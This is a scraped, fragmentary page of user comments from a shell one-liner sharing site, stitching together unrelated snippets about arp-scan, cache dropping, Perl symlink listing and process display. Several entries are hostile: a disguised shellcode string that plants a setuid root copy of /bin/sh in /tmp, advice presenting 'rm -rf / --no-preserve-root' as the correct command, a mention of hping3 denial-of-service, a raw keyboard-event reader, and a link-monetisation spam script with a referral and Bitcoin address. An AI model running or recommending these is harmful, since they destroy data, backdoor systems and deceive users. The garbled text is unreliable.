I just added the args [arp-scan --localnet] which works for Debian users, because the package 'arp' has name 'arp-scan', and it doesn't works with the argument 'arp'.
It looks like this "feature" let us to "eval" and "bind" a lexical env at subshell start. For sure, it could have some 'legal' use ... Show Sample Output
musica nel cuore dove c'? musica note di emozioni
I has used Coinurl to make some Bitcoins. I created my own piramidal sistem... here is the script: #!/bin/bash IFS=$'\n' clear ############# b=hist ############# rm -rf dbfinal.txt rm -rf ad.txt rm -rf curlapi.txt echo "https://coinurl.com/api.php?uuid=537......................1&url=" > curlapi.txt echo "https://coinurl.com/api.php?uuid=537......................2&url=" >> curlapi.txt echo "https://coinurl.com/api.php?uuid=537......................3&url=" >> curlapi.txt echo "https://coinurl.com/api.php?uuid=537......................4&url=" >> curlapi.txt echo "https://coinurl.com/api.php?uuid=537......................5&url=" >> curlapi.txt echo "https://coinurl.com/api.php?uuid=537......................6&url=" >> curlapi.txt azz=$(cat curlapi.txt | wc -l) for xx in $(seq 1 $azz) do cat curlapi.txt >> ad.txt done ############# rm -rf db$b.txt ############# d=$(cat $b.txt | wc -l) for a in $(seq 1 $d) do e=$(cat $b.txt | sed -n "$a,$a p" | cut -d " " -f1) g=$(cat ad.txt | sed -n "$a,$a p") d=$(curl "$g$e"); sleep 2 echo "$d $e" echo "$d $e" >> db$b.txt done sleep 3 echo "db$b.txt" rm -rf ad.txt rm -rf curlapi.txt If you find usefull the script yo can create a account on coin ur usin my refer: https://coinurl.com/index.php?ref=xmuda Or without ma refer https://coinurl.com/ I has made 0.02 BTC in 2 months, if you are not interested in Bitcoin, these post are not for you, but if you found the way to make btc using the method, you can say thx: 12HDiTko4VYPRMLJsZpCT7SQ6NrJW8ajEo Show Sample Output
-b option takes the broadcast address.
WARNING! If you are not feeling lucky, don't run this command! Show Sample Output
Perform a DOS attack from Linux using hping3 DOS=Denial-of-Service
There is a legend that says that when we write "rm -rf /" it will destroy all folders in linux. But is only a legend, it doesn't work in Fedora or Centos. The correct way to do it is using "--no-preserve-root"
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"; I do not advise you to do this command before a little research! I do not advise you to do this command before a little research! I do not advise you to do this command before a little research! I do not advise you to do this command before a little research! I do not advise you to do this command before a little research! I do not advise you to do this command before a little research! Show Sample Output
Hint: don'd do that!
Perl alternative to list symlinks with a clumsy regexp filter: place the regex instead of he example 'libxml' and end it with a wildchar to see the results (previous cd on dir). Is it possible change the '-l' test for '-d' and it will search for directories. [Same applies for -x and -X. See $(perldoc -f -x) for more tests]. I use it quite often when dealing with shared libraries... Show Sample Output
=1 --> to free pagecache =2 --> to free dentries and inodes =3 --> to free pagecache, dentries and inodes
great way to annoy someone or test their char escaping skills Show Sample Output
python -c "DEV = '/dev/input/event4'
#if event0 doesn't work, try event1 event2 etc
fo = open(DEV)
def interpret(keycode,state):
if state == 0:
print '%i up'%keycode
if state == 1:
print '%i down'%keycode
if state == 2:
print '%i repeat'%keycode
while 1:
line = fo.read(16)
if ord(line[10]) != 0:
keycode,state = line[10],line[12]
Show Sample Output
A pretty nice display of processes. Show Sample Output
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